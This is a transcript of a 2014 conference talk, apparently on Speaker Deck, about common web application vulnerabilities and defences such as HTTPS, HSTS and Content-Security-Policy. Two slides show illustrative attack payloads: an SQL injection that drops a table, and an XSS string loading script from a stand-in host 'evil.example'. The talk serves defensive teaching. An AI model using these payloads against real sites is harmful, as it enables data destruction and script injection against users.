Upgrade to PRO for Only $50/Year—Limited-Time Offer! 🔥

There Is No Silver Bullet

Avatar for Harley Watson Harley Watson
November 29, 2014
Programming
0
960

There Is No Silver Bullet

Avatar for Harley Watson

Harley Watson

November 29, 2014
Tweet

More Decks by Harley Watson

See All by Harley Watson
paper tickets > smartcards, probably.
Avatar for Harley Watson unlobito
0
7.7k
one, two step
Avatar for Harley Watson unlobito
0
820
What's in your pocket? (BSides Manchester)
Avatar for Harley Watson unlobito
0
1k
sorry, we're cash only. (securi-tay)
Avatar for Harley Watson unlobito
1
1.2k
Sorry, we're cash only. (hacksoc)
Avatar for Harley Watson unlobito
0
110
There Is No Silver Bullet (Español)
Avatar for Harley Watson unlobito
0
170

Other Decks in Programming

See All in Programming
AtCoder Conference 2025「LLM時代のAHC」
Avatar for Yuki Imajuku imjk
2
590
ゆくKotlin くるRust
Avatar for TATSUNO Yasuhiro exoego
1
160
AIコーディングエージェント(NotebookLM)
Avatar for kondai kondai24
0
240
LLMで複雑な検索条件アセットから脱却する!! 生成的検索インタフェースの設計論
Avatar for po3rin po3rin
4
980
Kotlin Multiplatform Meetup - Compose Multiplatform 외부 의존성 아키텍처 설계부터 운영까지
Avatar for Suhyeon Kim wisemuji
0
130
ZJIT: The Ruby 4 JIT Compiler / Ruby Release 30th Anniversary Party
Avatar for Takashi Kokubun k0kubun
1
280
perlをWebAssembly上で動かすと何が嬉しいの??? / Where does Perl-on-Wasm actually make sense?
Avatar for mackee mackee
0
170
re:Invent 2025 トレンドからみる製品開発への AI Agent 活用
Avatar for Kohei Yoshikawa yoskoh
0
440
Flutter On-device AI로 완성하는 오프라인 앱, 박제창 @DevFest INCHEON 2025
Avatar for JaiChangPark itsmedreamwalker
1
160
Implementation Patterns
Avatar for Denys Poltorak denyspoltorak
0
120
メルカリのリーダビリティチームが取り組む、AI時代のスケーラブルな品質文化
Avatar for osari.k cloverrose
2
390
AIエージェントの設計で注意するべきポイント6選
Avatar for Har1101 har1101
5
2.4k

Featured

See All Featured
[RailsConf 2023 Opening Keynote] The Magic of Rails
Avatar for Eileen M. Uchitelle eileencodes
31
9.8k
Self-Hosted WebAssembly Runtime for Runtime-Neutral Checkpoint/Restore in Edge–Cloud Continuum
Avatar for Yuki Nakata chikuwait chikuwait
0
230
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
Avatar for Stéphanie Walter stephaniewalter
286
14k
A better future with KSS
Avatar for Kyle Neath kneath
240
18k
Chasing Engaging Ingredients in Design
Avatar for Sebastian Deterding codingconduct
0
85
Introduction to Domain-Driven Design and Collaborative software design
Avatar for Kenny Baas-Schwegler baasie
1
520
StorybookのUI Testing Handbookを読んだ
Avatar for Shingo Yamazaki zakiyama
31
6.5k
The Anti-SEO Checklist Checklist. Pubcon Cyber Week
Avatar for Ryan Jones ryanjones
0
28
Designing Dashboards & Data Visualisations in Web Apps
Avatar for Des Traynor destraynor
231
54k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
Avatar for Kevin Liebholz kevinliebholz
37
6.2k
Why Mistakes Are the Best Teachers: Turning Failure into a Pathway for Growth
Avatar for Umar Saidu Auna auna
0
28
The AI Revolution Will Not Be Monopolized: How open-source beats economies of scale, even for LLMs
Avatar for Ines Montani inesmontani
PRO
3
2.8k

Transcript

  1. there is no silver bullet Henri Watson

  2. Which  vulnerabili.es  commonly   affect  web  applica.ons  in  the  

    Dominican  Republic?  

  3. No  HTTPS  

  4. Using  HTTPS  won’t  cost  you   an  arm  and  a

     leg.  

  5. The  current  proposal  for   HTTP/2.0  requires  TLS.  

  6. If  you  decide  to  use  HTTPS,   also  use  Strict-­‐Transport-­‐Security

      and  ssllabs.com/ssltest  

  7. SQL  Injec.ons  

  8. GET  /tracker?order=12345”;   DROP  TABLE  orders;-­‐-­‐   SELECT  *  FROM

     orders  WHERE  order  =  “12345”;   DROP  TABLE  orders;-­‐-­‐”  AND  status  =  “pending”   Request  from   the  client  to  the  server   Request  from  the   webserver  to  the  database  
  9. None
  10. None
  11. None

  12. Authen.ca.on  Implementa.on   Mistakes  

  13. None
  14. None

  15. Cross-­‐Site  Scrip.ng  (XSS)  

  16. GET  /hi?name=<script  src=“hep://evil.example/ l33thax.js”></script>   Hello,  <script  src=“hep://evil.example/ l33thax.js”></script>!  

    Request  from   the  client  to  the  server   Reply  from   the  server  to  the  client  

  17. Content-­‐Security-­‐Policy  

  18. Exposure  of  Sensi.ve  Data  

  19. None

  20. Using  Components  With   Known  Vulnerabili.es  

  21. Mailing  Lists   •  bugtraq   hep://www.securityfocus.com/archive/1   •  debian-­‐security-­‐announce

      heps://lists.debian.org/debian-­‐security-­‐announce/   •  fulldisclosure   hep://nmap.org/mailman/lis.nfo/fulldisclosure  

  22. Mailing  Lists   •  [email protected]   heps://hepd.apache.org/lists.html#hep-­‐announce   •  nginx-­‐announce

      hep://mailman.nginx.org/mailman/lis.nfo/nginx-­‐ announce   •  php-­‐announce   hep://php.net/mailing-­‐lists.php  
  23. None

  24. Customer  Service  

  25. None

  26. Why  is  there  no  “silver  bullet”?  

  27. Informa.on  security  is  a  constant   investment.  

  28. Heartbleed  

  29. By  placing  your  users’  informa.on  at   risk,  you  also

     risk  ruining  your   company’s  reputa.on.  

  30. Thanks!   @henriwatson   [email protected]     heps://henriwatson.com/talks/silverbullet